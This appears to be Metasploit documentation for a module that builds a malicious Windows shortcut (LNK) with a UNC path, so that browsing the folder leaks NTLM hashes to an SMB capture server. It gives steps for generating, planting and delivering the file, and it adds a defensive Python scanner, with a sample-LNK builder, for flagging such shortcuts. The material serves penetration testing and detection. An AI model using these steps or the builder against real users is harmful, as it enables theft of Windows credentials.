Path: blob/master/documentation/modules/auxiliary/fileformat/specialfolder_leak.md
## Vulnerable Application

Windows systems on which Explorer parses LNK files, in particular when a user browses a directory that contains the malicious shortcut. When the shortcut points at a UNC path, Explorer initiates an SMB connection to that host, which leaks the user's NTLM credentials (the NTLM challenge/response) over SMB.
References:
Disclosure Date: 2025-05-10 (reported to MSRC).
## Verification Steps

1. Start `msfconsole`.
2. Load the module:
   ```
   use auxiliary/fileformat/specialfolderdatablock_lnk
   ```
3. Customize options as needed (e.g., set `FILENAME` or `APPNAME`).
4. Execute the module:
   ```
   run
   ```
5. A malicious LNK file will be generated.
6. If not using a custom `UNCPATH`, the module starts an SMB capture server automatically.
7. Place the LNK file in a directory on the target system.
8. Browse to the directory in Windows Explorer to trigger the SMB connection.
9. Monitor the console for captured NTLM hashes.
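The steps above describe the attack side. The example below is added here for the defensive side and is not part of the module or its documentation: a small parser that walks a `.lnk` file according to the MS-SHLLINK layout (header, LinkTargetIDList, LinkInfo, StringData, ExtraData) and flags the fields through which Explorer can be steered to an outbound SMB connection: UNC paths in LinkInfo, in the icon/working-directory/target strings, or inside ExtraData blocks, plus the presence of a SpecialFolderDataBlock (signature `0xA0000005`). The function names `scan_lnk` and `build_sample_lnk`, and the sample shortcut it builds (using the documentation address `203.0.113.7`), are constructed for this example; the sample is not output from the Metasploit module.

```python
"""Defensive .lnk scanner: flag shortcuts that would trigger an outbound SMB
connection when Explorer renders them. Added example, not module code."""
import re
import struct

# ShellLinkHeader constants from MS-SHLLINK
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_ID_LIST, FLAG_LINK_INFO, FLAG_NAME = 0x01, 0x02, 0x04
FLAG_REL_PATH, FLAG_WORK_DIR, FLAG_ARGS = 0x08, 0x10, 0x20
FLAG_ICON, FLAG_UNICODE = 0x40, 0x80
SPECIAL_FOLDER_BLOCK = 0xA0000005  # ExtraData block signature

# A UNC path: \\host\share... (ASCII form searched in raw bytes, text form in decoded strings)
UNC_ASCII = re.compile(rb"\\\\[^\\\x00]+\\[^\x00]*")
UNC_TEXT = re.compile(r"\\\\[^\\\x00]+\\[^\x00]*")


def _find_unc(blob: bytes) -> list:
    """Search a binary blob for UNC paths stored either as ANSI or as UTF-16LE."""
    hits = [m.group(0).decode("latin-1") for m in UNC_ASCII.finditer(blob)]
    hits += UNC_TEXT.findall(blob.decode("utf-16le", errors="ignore"))
    return hits


def scan_lnk(data: bytes) -> dict:
    """Parse a .lnk file and report UNC references and ExtraData blocks."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    is_unicode = bool(flags & FLAG_UNICODE)
    findings = {"unc_paths": [], "special_folder_block": False, "extra_blocks": []}
    pos = 76  # fixed-size ShellLinkHeader

    if flags & FLAG_ID_LIST:  # LinkTargetIDList: 2-byte size + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]

    if flags & FLAG_LINK_INFO:  # LinkInfo: 4-byte total size, may hold a CommonNetworkRelativeLink
        size = struct.unpack_from("<I", data, pos)[0]
        findings["unc_paths"] += _find_unc(data[pos:pos + size])
        pos += size

    # StringData in fixed order; each is a 2-byte char count followed by the chars
    for flag in (FLAG_NAME, FLAG_REL_PATH, FLAG_WORK_DIR, FLAG_ARGS, FLAG_ICON):
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if is_unicode else count
            raw = data[pos:pos + nbytes]
            pos += nbytes
            text = raw.decode("utf-16le") if is_unicode else raw.decode("cp1252", errors="replace")
            findings["unc_paths"] += UNC_TEXT.findall(text)

    # ExtraData: blocks of (BlockSize, BlockSignature, body) until a BlockSize < 4
    while pos + 8 <= len(data):
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        findings["extra_blocks"].append(sig)
        if sig == SPECIAL_FOLDER_BLOCK:
            findings["special_folder_block"] = True
        findings["unc_paths"] += _find_unc(data[pos + 8:pos + size])
        pos += size

    findings["unc_paths"] = sorted(set(findings["unc_paths"]))
    findings["suspicious"] = bool(findings["unc_paths"])
    return findings


def build_sample_lnk(icon_location: str) -> bytes:
    """Constructed sample (not module output): a Unicode LNK with a terminal-only
    IDList, the given ICON_LOCATION string, and a SpecialFolderDataBlock."""
    flags = FLAG_ID_LIST | FLAG_ICON | FLAG_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (76 - len(header))  # attributes, timestamps, size, icon index, reserved
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDListSize=2: just the TerminalID
    string_data = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16le")
    # SpecialFolderDataBlock: BlockSize 0x10, signature, SpecialFolderID (0x25 = CSIDL_SYSTEM), Offset
    sfdb = struct.pack("<IIII", 0x10, SPECIAL_FOLDER_BLOCK, 0x25, 0)
    terminal = struct.pack("<I", 0)
    return header + id_list + string_data + sfdb + terminal


if __name__ == "__main__":
    sample = build_sample_lnk(r"\\203.0.113.7\share\icon.ico")
    print(scan_lnk(sample))
```

Run over a quarantined share or mail attachment store, a hit in `unc_paths` is the signal worth alerting on: Explorer resolves icon and target locations while merely listing a folder, so no double-click is needed for the SMB connection. The presence of a SpecialFolderDataBlock alone is not malicious (legitimate shortcuts carry it), which is why the `suspicious` verdict keys on the UNC reference rather than on the block.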
## Options

### APPNAME

Sets the display name of the application in the LNK file. If empty, a random name is generated.
Example:
## Scenarios

### Basic NTLM Hash Capture on Windows

- Target: A Windows system with Explorer (e.g., Windows 10 or later).
- Attacker: Use the module to generate the LNK and capture hashes locally.

Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive). When the victim opens the containing folder in Explorer, an SMB connection is attempted: